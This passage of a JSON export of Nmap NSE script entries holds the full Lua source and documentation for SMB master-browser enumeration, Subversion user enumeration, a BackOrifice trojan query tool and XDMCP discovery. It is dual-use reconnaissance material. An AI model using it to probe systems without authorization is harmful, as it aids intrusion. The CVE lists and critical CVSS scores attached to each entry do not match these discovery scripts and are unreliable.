0x00800000,\n SV_TYPE_CLUSTER_NT = 0x01000000,\n SV_TYPE_TERMINALSERVER = 0x02000000,\n SV_TYPE_CLUSTER_VS_NT = 0x04000000,\n SV_TYPE_DCE = 0x10000000,\n SV_TYPE_ALTERNATE_XPORT = 0x20000000,\n SV_TYPE_LOCAL_LIST_ONLY = 0x40000000,\n SV_TYPE_DOMAIN_ENUM = 0x80000000,\n SV_TYPE_ALL = 0xFFFFFFFF\n}\n\nTypeNames = {\n SV_TYPE_WORKSTATION = { long = \"Workstation\", short = \"WKS\" },\n SV_TYPE_SERVER = { long = \"Server service\", short = \"SRVSVC\" },\n SV_TYPE_SQLSERVER = { long = \"SQL Server\", short = \"MSSQL\" },\n SV_TYPE_DOMAIN_CTRL = { long = \"Domain Controller\", 
short = \"DC\" },\n SV_TYPE_DOMAIN_BAKCTRL = { long = \"Backup Domain Controller\", short = \"BDC\" },\n SV_TYPE_TIME_SOURCE = { long = \"Time Source\", short = \"TIME\" },\n SV_TYPE_AFP = { long = \"Apple File Protocol Server\", short = \"AFP\" },\n SV_TYPE_NOVELL = { long = \"Novell Server\", short = \"NOVELL\" },\n SV_TYPE_DOMAIN_MEMBER = { long = \"LAN Manager Domain Member\", short = \"MEMB\" },\n SV_TYPE_PRINTQ_SERVER = { long = \"Print server\", short = \"PRINT\" },\n SV_TYPE_DIALIN_SERVER = { long = \"Dial-in server\", short = \"DIALIN\" },\n SV_TYPE_SERVER_UNIX = { long = \"Unix server\", short = \"UNIX\" },\n SV_TYPE_NT = { long = \"Windows NT/2000/XP/2003 server\", short = \"NT\" },\n SV_TYPE_WFW = { long = \"Windows for workgroups\", short = \"WFW\" },\n SV_TYPE_SERVER_MFPN = { long = \"Microsoft File and Print for Netware\", short=\"MFPN\" },\n SV_TYPE_SERVER_NT = { long = \"Server\", short = \"SRV\" },\n SV_TYPE_POTENTIAL_BROWSER = { long = \"Potential Browser\", short = \"POTBRWS\" },\n SV_TYPE_BACKUP_BROWSER = { long = \"Backup Browser\", short = \"BCKBRWS\"},\n SV_TYPE_MASTER_BROWSER = { long = \"Master Browser\", short = \"MBRWS\"},\n SV_TYPE_DOMAIN_MASTER = { long = \"Domain Master Browser\", short = \"DOMBRWS\"},\n SV_TYPE_WINDOWS = { long = \"Windows 95/98/ME\", short=\"WIN95\"},\n SV_TYPE_DFS = { long = \"DFS Root\", short = \"DFS\"},\n SV_TYPE_TERMINALSERVER = { long = \"Terminal Server\", short = \"TS\" },\n}\n\nOutputFormat = {\n BY_TYPE_H = 1,\n BY_TYPE_V = 2,\n BY_TYPE_V_DETAILED = 3,\n}\n\n\naction = function(host, port)\n\n local status, smbstate = smb.start(host)\n local err, entries\n local path = (\"\\\\\\\\%s\\\\IPC$\"):format(host.ip)\n local detail_level = 1\n local format = stdnse.get_script_args(\"smb-mbenum.format\") or OutputFormat.BY_TYPE_V_DETAILED\n local filter = stdnse.get_script_args(\"smb-mbenum.filter\") or ServerTypes.SV_TYPE_ALL\n local domain = stdnse.get_script_args(\"smb-mbenum.domain\")\n\n filter = 
tonumber(filter) or ServerTypes[filter]\n format = tonumber(format)\n\n if ( not(filter) ) then\n return \"\\n The argument smb-mbenum.filter contained an invalid value.\"\n end\n\n if ( not(format) ) then\n return \"\\n The argument smb-mbenum.format contained an invalid value.\"\n end\n\n local errstr = nil\n status, err = smb.negotiate_protocol(smbstate, {})\n if ( not(status) ) then\n log(\"ERROR: smb.negotiate_protocol failed\")\n errstr = \"\\n ERROR: Failed to connect to browser service: \" .. err\n else\n\n status, err = smb.start_session(smbstate, {})\n if ( not(status) ) then\n log(\"ERROR: smb.start_session failed\")\n errstr = \"\\n ERROR: Failed to connect to browser service: \" .. err\n else\n\n status, err = smb.tree_connect(smbstate, path, {})\n if ( not(status) ) then\n log(\"ERROR: smb.tree_connect failed\")\n errstr = \"\\n ERROR: Failed to connect to browser service: \" .. err\n else\n\n status, entries = msrpc.rap_netserverenum2(smbstate, domain, filter, detail_level)\n if ( not(status) ) then\n log(\"ERROR: msrpc.rap_netserverenum2 failed\")\n -- 71 == 0x00000047, ERROR_REQ_NOT_ACCEP\n -- http://msdn.microsoft.com/en-us/library/cc224501.aspx\n if entries:match(\"= 71$\") then\n errstr = \"Not a master or backup browser\"\n else\n errstr = \"\\n ERROR: \" .. 
entries\n end\n end\n end\n\n status, err = smb.tree_disconnect(smbstate)\n if ( not(status) ) then log(\"ERROR: smb.tree_disconnect failed\") end\n end\n\n status, err = smb.logoff(smbstate)\n if ( not(status) ) then log(\"ERROR: smb.logoff failed\") end\n end\n\n status, err = smb.stop(smbstate)\n if ( not(status) ) then log(\"ERROR: smb.stop failed\") end\n\n if errstr then\n return errstr\n end\n\n local results, output = {}, {}\n for k, _ in pairs(ServerTypes) do\n for _, server in ipairs(entries) do\n if ( TypeNames[k] and (server.type & ServerTypes[k]) == ServerTypes[k] ) then\n results[TypeNames[k].long] = results[TypeNames[k].long] or {}\n if ( format == OutputFormat.BY_TYPE_V_DETAILED ) then\n table.insert(results[TypeNames[k].long], server)\n else\n table.insert(results[TypeNames[k].long], server.name)\n end\n end\n end\n end\n\n if ( format == OutputFormat.BY_TYPE_H ) then\n for k, v in pairs(results) do\n local row = (\"%s: %s\"):format( k, table.concat(v, \",\") )\n table.insert(output, row)\n end\n table.sort(output)\n elseif( format == OutputFormat.BY_TYPE_V ) then\n for k, v in pairs(results) do\n v.name = k\n table.insert(output, v)\n end\n table.sort(output, function(a,b) return a.name < b.name end)\n elseif( format == OutputFormat.BY_TYPE_V_DETAILED ) then\n for k, v in pairs(results) do\n local cat_tab = tab.new(3)\n table.sort(v, function(a,b) return a.name < b.name end )\n for _, server in pairs(v) do\n tab.addrow(\n cat_tab,\n server.name,\n (\"%d.%d\"):format(server.version.major,server.version.minor),\n server.comment\n )\n end\n table.insert(output, { name = k, tab.dump(cat_tab) } )\n end\n table.sort(output, function(a,b) return a.name < b.name end)\n end\n\n return stdnse.format_output(true, output)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:42:51", "description": "Enumerates users of a Subversion repository by examining logs of most recent commits.\n\n## Script Arguments 
\n\n#### http-svn-enum.url \n\nThis is a URL relative to the scanned host eg. /default.html (default: /).\n\n#### http-svn-enum.count \n\nThe number of logs to fetch. Defaults to the last 1000 commits.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script http-svn-enum <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 443/tcp open https syn-ack\n | http-svn-enum:\n | Author Count Revision Date\n | gyani 183 34965 2015-07-24\n | robert 1 34566 2015-06-02\n | david 2 34785 2015-06-28\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [shortport](<../lib/shortport.html>)\n * [slaxml](<../lib/slaxml.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-07-25T09:56:07", "type": "nmap", "title": "http-svn-enum NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-08-15T07:26:00", "id": "NMAP:HTTP-SVN-ENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/http-svn-enum.html", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal slaxml = require \"slaxml\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\n\ndescription = [[Enumerates users of a Subversion repository by examining logs of most recent commits.\n]]\n\n---\n-- @usage nmap --script http-svn-enum <target>\n--\n-- @args http-svn-enum.count The number of logs to fetch. Defaults to the last 1000 commits.\n-- @args http-svn-enum.url This is a URL relative to the scanned host eg. /default.html (default: /).\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 443/tcp open https syn-ack\n-- | http-svn-enum:\n-- | Author Count Revision Date\n-- | gyani 183 34965 2015-07-24\n-- | robert 1 34566 2015-06-02\n-- | david 2 34785 2015-06-28\n--\n-- @xmloutput\n-- <table></table>\n-- <table>\n-- <elem>Author</elem>\n-- <elem>Count</elem>\n-- <elem>Revision</elem>\n-- <elem>Date</elem>\n-- </table>\n-- <table>\n-- <elem>gyani</elem>\n-- <elem>183</elem>\n-- <elem>34965</elem>\n-- <elem>2015-07-24</elem>\n-- </table>\n-- <table>\n-- <elem>robert</elem>\n-- <elem>1</elem>\n-- <elem>34566</elem>\n-- <elem>2015-06-02</elem>\n-- </table>\n-- <table>\n-- <elem>david</elem>\n-- <elem>2</elem>\n-- <elem>34785</elem>\n-- <elem>2015-06-28</elem>\n-- </table>\n\nauthor = \"Gyanendra Mishra\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"default\", \"discovery\", \"safe\"}\n\nlocal ELEMENTS = {\n [\"creator-displayname\"] = \"author\",\n [\"version-name\"] = \"version\",\n [\"date\"] = \"date\",\n}\n\nlocal function 
get_callback(name, unames, temp)\n if ELEMENTS[name] then\n return function(content)\n if not content then content = \"unknown\" end --useful for \"nil\" authors\n temp[ELEMENTS[name]] = name == \"date\" and content:sub(1, 10) or content\n if temp.date and temp.version and temp.author then\n unames[temp.author] = {unames[temp.author] and unames[temp.author][1] + 1 or 1, temp.version, temp.date}\n end\n end\n end\nend\n\nportrule = shortport.http\n\naction = function(host, port)\n\n local count = tonumber(stdnse.get_script_args(SCRIPT_NAME .. \".count\")) or 1000\n local url = stdnse.get_script_args(SCRIPT_NAME .. \".url\") or \"/\"\n local output, revision, unames = tab.new(), nil, {}\n\n local options = {\n header = {\n [\"Depth\"] = 0,\n },\n }\n\n -- first we fetch the current revision number\n local response = http.generic_request(host, port, \"PROPFIND\", url, options)\n if response and response.status == 207 then\n\n local parser = slaxml.parser:new()\n parser._call = {startElement = function(name)\n parser._call.text = name == \"version-name\" and function(content) revision = tonumber(content) end end,\n closeElement = function(name) parser._call.text = function() return nil end end\n }\n parser:parseSAX(response.body, {stripWhitespace=true})\n\n if revision then\n\n local start_revision = revision > count and revision - count or 1\n local content = '<?xml version=\"1.0\"?> <S:log-report xmlns:S=\"svn:\"> <S:start-revision>'.. start_revision .. 
'</S:start-revision> <S:discover-changed-paths/> </S:log-report>'\n\n options = {\n header = {\n [\"Depth\"] = 1,\n },\n content = content,\n }\n\n local temp = {}\n response = http.generic_request(host, port, \"REPORT\", url, options)\n if response and response.status == 200 then\n\n parser._call.startElement = function(name) parser._call.text = get_callback(name, unames, temp) end\n parser._call.closeElement = function(name) if name == \"log-item\" then temp ={} end parser._call.text = function() return nil end end\n parser:parseSAX(response.body, {stripWhitespace=true})\n\n tab.nextrow(output)\n tab.addrow(output, \"Author\", \"Count\", \"Revision\", \"Date\")\n\n for revision_author, data in pairs(unames) do\n tab.addrow(output, revision_author, data[1], data[2], data[3])\n end\n\n if next(unames) then return output end\n end\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:24", "description": "Connects to a BackOrifice service and gathers information about the host and the BackOrifice service itself. \n\nThe extracted host information includes basic system setup, list of running processes, network resources and shares. 
\n\nInformation about the service includes enabled port redirections, listening console applications and a list of BackOrifice plugins installed with the service.\n\n## Script Arguments \n\n#### backorifice-info.seed \n\nEncryption seed (default derived from password, or 31337 for no password).\n\n#### backorifice-info.password \n\nEncryption password (defaults to no password).\n\n## Example Usage \n \n \n nmap --script backorifice-info <target> --script-args backorifice-info.password=<password>\n \n\n## Script Output \n \n \n 31337/udp open|filtered BackOrifice\n | backorifice-info:\n | PING REPLY\n | !PONG!1.20!HAL9000!\n | SYSTEM INFO\n | System info for machine 'HAL9000'\n | Current user: 'Dave'\n | Processor: I586\n | Win32 on Windows 95 v4.10 build 2222 - A\n | Memory: 63M in use: 30% Page file: 1984M free: 1970M\n | C:\\ - Fixed Sec/Clust: 64 Byts/Sec: 512, Bytes free: 2147155968/21471\n | ...155968\n | D:\\ - CD-ROM\n | PROCESS LIST\n | PID - Executable\n | 4293872589 C:\\WINDOWS\\SYSTEM\\KERNEL32.DLL\n | 4294937581 C:\\WINDOWS\\SYSTEM\\MSGSRV32.EXE\n | 4294935933 C:\\WINDOWS\\SYSTEM\\MPREXE.EXE\n | 4294843869 C:\\WINDOWS\\SYSTEM\\MSTASK.EXE\n | 4294838549 C:\\WINDOWS\\SYSTEM\\ .EXE\n | 4294864917 C:\\WINDOWS\\EXPLORER.EXE\n | 4294880413 C:\\WINDOWS\\TASKMON.EXE\n | 4294878445 C:\\WINDOWS\\SYSTEM\\SYSTRAY.EXE\n | 4294771309 C:\\WINDOWS\\WINIPCFG.EXE\n | 4294772081 C:\\WINDOWS\\SYSTEM\\WINOA386.MOD\n | NETWORK RESOURCES - NET VIEW\n | (null) '(null)' - Microsoft Network - UNKNOWN! 
(Network root?):CONTAINER\n | (null) 'WORKGROUP' - (null) - DOMAIN:CONTAINER\n | (null) '\\\\HAL9000' - - SERVER:CONTAINER\n | (null) '\\\\HAL9000\\DOCUMENTS' - sample comment 2 - SHARE:DISK\n | (null) '\\\\WIN982' - - SERVER:CONTAINER\n | (null) '\\\\WIN982\\BO' - tee hee hee comment - SHARE:DISK\n | SHARELIST\n | 'DOCUMENTS'-C:\\WINDOWS\\DESKTOP\\DOCUMENTS 'sample comment 2' RO:'' RW:'\n | ...'' Disk PERSISTANT READONLY\n | 'IPC$'- 'Remote Inter Process Communication' RO:'' RW:'' IPC FULL\n | REDIRECTED PORTS\n | 0 redirs displayed\n | LISTENING CONSOLE APPLICATIONS\n | 0 apps listed\n | PLUGIN LIST\n |_ End of plugins\n \n\n## Requires \n\n * [bits](<../lib/bits.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-04-20T07:45:10", "type": "nmap", "title": "backorifice-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-02T20:51:05", "id": "NMAP:BACKORIFICE-INFO.NSE", "href": 
"https://nmap.org/nsedoc/scripts/backorifice-info.html", "sourceData": "local bits = require \"bits\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nConnects to a BackOrifice service and gathers information about\nthe host and the BackOrifice service itself.\n\nThe extracted host information includes basic system setup, list\nof running processes, network resources and shares.\n\nInformation about the service includes enabled port redirections,\nlistening console applications and a list of BackOrifice plugins\ninstalled with the service.\n]]\n\n---\n-- @usage\n-- nmap --script backorifice-info <target> --script-args backorifice-info.password=<password>\n--\n-- @arg backorifice-info.password Encryption password (defaults to no password).\n-- @arg backorifice-info.seed Encryption seed (default derived from password, or 31337 for no password).\n--\n--@output\n--31337/udp open|filtered BackOrifice\n--| backorifice-info:\n--| PING REPLY\n--| !PONG!1.20!HAL9000!\n--| SYSTEM INFO\n--| System info for machine 'HAL9000'\n--| Current user: 'Dave'\n--| Processor: I586\n--| Win32 on Windows 95 v4.10 build 2222 - A\n--| Memory: 63M in use: 30% Page file: 1984M free: 1970M\n--| C:\\ - Fixed Sec/Clust: 64 Byts/Sec: 512, Bytes free: 2147155968/21471\n--| ...155968\n--| D:\\ - CD-ROM\n--| PROCESS LIST\n--| PID - Executable\n--| 4293872589 C:\\WINDOWS\\SYSTEM\\KERNEL32.DLL\n--| 4294937581 C:\\WINDOWS\\SYSTEM\\MSGSRV32.EXE\n--| 4294935933 C:\\WINDOWS\\SYSTEM\\MPREXE.EXE\n--| 4294843869 C:\\WINDOWS\\SYSTEM\\MSTASK.EXE\n--| 4294838549 C:\\WINDOWS\\SYSTEM\\ .EXE\n--| 4294864917 C:\\WINDOWS\\EXPLORER.EXE\n--| 4294880413 C:\\WINDOWS\\TASKMON.EXE\n--| 4294878445 C:\\WINDOWS\\SYSTEM\\SYSTRAY.EXE\n--| 4294771309 C:\\WINDOWS\\WINIPCFG.EXE\n--| 4294772081 C:\\WINDOWS\\SYSTEM\\WINOA386.MOD\n--| NETWORK RESOURCES - NET VIEW\n--| (null) '(null)' - 
Microsoft Network - UNKNOWN! (Network root?):CONTAINER\n--| (null) 'WORKGROUP' - (null) - DOMAIN:CONTAINER\n--| (null) '\\\\HAL9000' - - SERVER:CONTAINER\n--| (null) '\\\\HAL9000\\DOCUMENTS' - sample comment 2 - SHARE:DISK\n--| (null) '\\\\WIN982' - - SERVER:CONTAINER\n--| (null) '\\\\WIN982\\BO' - tee hee hee comment - SHARE:DISK\n--| SHARELIST\n--| 'DOCUMENTS'-C:\\WINDOWS\\DESKTOP\\DOCUMENTS 'sample comment 2' RO:'' RW:'\n--| ...'' Disk PERSISTANT READONLY\n--| 'IPC$'- 'Remote Inter Process Communication' RO:'' RW:'' IPC FULL\n--| REDIRECTED PORTS\n--| 0 redirs displayed\n--| LISTENING CONSOLE APPLICATIONS\n--| 0 apps listed\n--| PLUGIN LIST\n--|_ End of plugins\n--\n\nauthor = \"Gorjan Petrovski\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\ndependencies = {\"backorifice-brute\"}\n\n\nportrule = shortport.port_or_service (31337, \"BackOrifice\", \"udp\")\n\n\n--variables\nlocal g_packet = 0\n\n--\"constants\"\nlocal MAGICSTRING =\"*!*QWTY?\"\nlocal TYPE = {\n ERROR = 0x00,\n PARTIAL_PACKET = 0x80,\n CONTINUED_PACKET = 0x40,\n PING = 0x01,\n SYSINFO = 0x06,\n PROCESSLIST = 0x20,\n NETVIEW = 0x39,\n NETEXPORTLIST = 0x12,\n REDIRLIST = 0x0D,\n APPLIST = 0x3F,\n PLUGINLIST = 0x2F\n}\n\n\n--table of commands which have output\nlocal cmds = {\n {cmd_name=\"PING REPLY\",p_code=TYPE.PING,arg1=\"\",arg2=\"\",\n filter = function(data)\n data = string.gsub(data,\" \",\"\")\n return data\n end},\n {cmd_name=\"SYSTEM INFO\",p_code=TYPE.SYSINFO,arg1=\"\",arg2=\"\",\n filter = function(data)\n if string.match(data,\"End of system info\") then return nil end\n return data\n end},\n {cmd_name=\"PROCESS LIST\",p_code=TYPE.PROCESSLIST,arg1=\"\",arg2=\"\",\n filter = function(data)\n if string.match(data,\"End of processes\") then return nil end\n data = string.gsub(data,\"pid\",\"PID\")\n return data\n end},\n {cmd_name=\"NETWORK RESOURCES - NET VIEW\",p_code=TYPE.NETVIEW,arg1=\"\",arg2=\"\",\n filter 
= function(data)\n if string.match(data,\"Network resources:\") then return nil end\n if string.match(data,\"End of resource list\") then return nil end\n return data\n end},\n {cmd_name=\"SHARELIST\",p_code=TYPE.NETEXPORTLIST,arg1=\"\",arg2=\"\",\n filter = function(data)\n if string.match(data,\"Shares as returned by system:\") then return nil end\n if string.match(data,\"End of shares\") then return nil end\n return data\n end},\n {cmd_name=\"REDIRECTED PORTS\",p_code=TYPE.REDIRLIST,arg1=\"\",arg2=\"\",\n filter = function(data)\n if string.match(data,\"Redirected ports:%s\") then return nil end\n return data\n end},\n {cmd_name=\"LISTENING CONSOLE APPLICATIONS\",p_code=TYPE.APPLIST,arg1=\"\",arg2=\"\",\n filter = function(data)\n if string.match(data,\"Active apps:\") then return nil end\n return data\n end},\n -- I !think! plugin list MUST be last because it causes problems server-side\n {cmd_name=\"PLUGIN LIST\",p_code=TYPE.PLUGINLIST,arg1=\"\",arg2=\"\",\n filter = function(data)\n if string.match(data,\"Plugins:\") then return nil end\n return data\n end}\n}\n\nlocal function gen_next_seed(seed)\n seed = seed*214013 + 2531011\n seed = seed & 0xffffff\n return seed\nend\n\nlocal function gen_initial_seed(password)\n if password == nil then\n return 31337\n else\n local y = #password\n local z = 0\n\n for x = 1,y do\n local pchar = string.byte(password,x)\n z = z + pchar\n end\n\n for x=1,y do\n local pchar = string.byte(password,x)\n if (x-1)%2 == 1 then\n z = z - (pchar * (y-(x-1)+1))\n else\n z = z + (pchar * (y-(x-1)+1))\n end\n z = z % 0x7fffffff\n end\n z = (z*y) % 0x7fffffff\n return z\n end\nend\n\n--BOcrypt returns encrypted/decrypted data\nlocal function BOcrypt(data, password, initial_seed )\n if data==nil then return end\n local output = {}\n\n local seed\n if(initial_seed == nil) then\n --calculate initial seed\n seed = gen_initial_seed(password)\n else\n --in case initial seed is set by backorifice brute\n seed = initial_seed\n end\n\n for i = 
1, #data do\n local data_byte = string.byte(data,i)\n\n --calculate next seed\n seed = gen_next_seed(seed)\n --calculate encryption key based on seed\n local key = bits.arshift(seed,16) & 0xff\n\n local crypto_byte = data_byte ~ key\n output[i] = string.char(crypto_byte)\n if i == 256 then break end --ARGSIZE limitation\n end\n return table.concat(output, \"\")\nend\n\nlocal function BOpack(type_packet, str1, str2)\n -- create BO packet\n local size = #MAGICSTRING + 4*2 + 3 + #str1 + #str2\n local data = MAGICSTRING .. string.pack(\"<I4 I4 B zz\", size, g_packet, type_packet, str1, str2)\n g_packet = g_packet + 1\n return data\nend\n\nlocal function BOunpack(packet)\n local header_format = (\"<c%d I4 I4 B\"):format(#MAGICSTRING)\n if #packet < string.packsize(header_format) then\n return nil, TYPE.ERROR\n end\n local magic, packetsize, packetid, type_packet, pos = string.unpack(header_format, packet)\n\n if magic ~= MAGICSTRING then return nil,TYPE.ERROR end --received non-BO packet\n if packetsize ~= #packet then\n -- No idea how often this happens or if it should be a fatal error\n stdnse.debug1(\"Wrong packet size: expected %d, got %d bytes\", packetsize, #packet)\n end\n\n local data = packet:sub(pos)\n\n return data, type_packet\nend\n\nlocal function insert_version_info(host,port,BOversion,BOhostname,initial_seed,password)\n if(port.version==nil) then port.version={} end\n if(port.version.name==nil) then\n port.version.name =\"BackOrifice\"\n port.version.name_confidence = 10\n end\n if(port.version.product==nil) then port.version.product =\"BackOrifice trojan\" end\n if(port.version.version == nil) then port.version.version = BOversion end\n if(port.version.extrainfo == nil) then\n if password == nil then\n if initial_seed == nil then\n port.version.extrainfo = \"no password\"\n else\n port.version.extrainfo = \"initial encryption seed=\"..initial_seed\n end\n else\n port.version.extrainfo = \"password=\"..password\n end\n end\n port.version.hostname = 
BOhostname\n if(port.version.ostype == nil) then port.version.ostype = \"Windows\" end\n nmap.set_port_version(host, port)\n nmap.set_port_state(host, port, \"open\")\nend\n\naction = function( host, port )\n --initial seed is set by backorifice-brute\n local initial_seed = stdnse.get_script_args( SCRIPT_NAME .. \".seed\" )\n local password = stdnse.get_script_args(SCRIPT_NAME .. \".password\")\n local socket = nmap.new_socket(\"udp\")\n local try = nmap.new_try(function() socket:close() end)\n socket:set_timeout(5000)\n\n local output_all={}\n\n for i=1,#cmds do\n --send command\n local data = BOpack( cmds[i].p_code, cmds[i].arg1, cmds[i].arg2 )\n data = BOcrypt(data, password, initial_seed)\n try(socket:sendto(host, port, data))\n\n --receive info\n local output, response, p_type, multi_flag\n output = {}\n output.name = cmds[i].cmd_name\n multi_flag = false\n while true do\n response = try(socket:receive())\n response = BOcrypt(response,password,initial_seed)\n response, p_type = BOunpack(response) -- p_type -> error, singular, partial, continued\n\n if p_type ~= TYPE.ERROR then\n local tmp_str = cmds[i].filter(response)\n if tmp_str ~= nil then\n if cmds[i].p_code==TYPE.PING then\n --invalid chars for hostname are allowed on old windows boxes\n local BOversion, BOhostname = string.match(tmp_str,\"!PONG!(1%.20)!(.*)!\")\n if BOversion==nil then\n --in case of bad PING reply return \"\"\n return\n else\n --fill up version information\n insert_version_info(host,port,BOversion,BOhostname,initial_seed,password)\n end\n end\n\n table.insert(output,tmp_str)\n end\n\n --singular\n if (p_type & TYPE.PARTIAL_PACKET)==0x00\n and (p_type & TYPE.CONTINUED_PACKET)==0x00 then break end\n\n --first\n if (p_type & TYPE.CONTINUED_PACKET)==0x00 then\n multi_flag = true\n end\n\n --last\n if (p_type & TYPE.PARTIAL_PACKET)==0x00 then break end\n end\n\n end\n --gather all responses in table\n table.insert(output_all,output)\n end\n\n socket:close()\n return 
stdnse.format_output(true,output_all)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:37", "description": "Discovers servers running the X Display Manager Control Protocol (XDMCP) by sending a XDMCP broadcast request to the LAN. Display managers allowing access are marked using the keyword Willing in the result.\n\n## Script Arguments \n\n#### broadcast-xdmcp-discover.timeout \n\nsocket timeout (default: 5s)\n\n## Example Usage \n \n \n nmap --script broadcast-xdmcp-discover\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-xdmcp-discover:\n |_ 192.168.2.162 - Willing\n \n\n## Requires \n\n * [os](<>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [xdmcp](<../lib/xdmcp.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-26T19:35:19", "type": "nmap", "title": "broadcast-xdmcp-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:BROADCAST-XDMCP-DISCOVER.NSE", "href": 
"https://nmap.org/nsedoc/scripts/broadcast-xdmcp-discover.html", "sourceData": "local os = require \"os\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal xdmcp = require \"xdmcp\"\n\ndescription = [[\nDiscovers servers running the X Display Manager Control Protocol (XDMCP) by\nsending a XDMCP broadcast request to the LAN. Display managers allowing access\nare marked using the keyword Willing in the result.\n]]\n\n---\n-- @usage\n-- nmap --script broadcast-xdmcp-discover\n--\n-- @output\n-- Pre-scan script results:\n-- | broadcast-xdmcp-discover:\n-- |_ 192.168.2.162 - Willing\n--\n-- @args broadcast-xdmcp-discover.timeout socket timeout (default: 5s)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"broadcast\", \"safe\"}\n\n\nprerule = function() return true end\n\nlocal arg_timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. \".timeout\"))\n\naction = function()\n\n local host, port = { ip = \"255.255.255.255\" }, { number = 177, protocol = \"udp\" }\n local options = { timeout = 1 }\n local helper = xdmcp.Helper:new(host, port, options)\n local status = helper:connect()\n\n local req = xdmcp.Packet[xdmcp.OpCode.BCAST_QUERY]:new(nil)\n local status, err = helper:send(req)\n if ( 